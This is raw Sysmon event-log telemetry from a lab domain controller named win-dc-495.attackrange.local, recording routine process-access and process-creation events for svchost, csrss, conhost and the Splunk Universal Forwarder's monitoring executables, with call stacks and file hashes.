14:08:46.060{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:46.060{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.060{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.060{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-966E-6005-7C05-00000000A301}1420C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.060{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-966E-6005-7C05-00000000A301}1420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.061{59A5CD1D-966E-6005-7C05-00000000A301}1420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.920{59A5CD1D-9670-6005-7F05-00000000A301}31245536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9670-6005-7F05-00000000A301}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:48.763{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:48.763{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9670-6005-7F05-00000000A301}3124C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9670-6005-7F05-00000000A301}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.764{59A5CD1D-9670-6005-7F05-00000000A301}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.248{59A5CD1D-9670-6005-7E05-00000000A301}42882960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.096{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9670-6005-7E05-00000000A301}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:48.094{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.094{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:48.094{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.094{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.093{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9670-6005-7E05-00000000A301}4288C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.093{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9670-6005-7E05-00000000A301}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.093{59A5CD1D-9670-6005-7E05-00000000A301}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.482{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9671-6005-8005-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.482{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:49.482{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.482{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
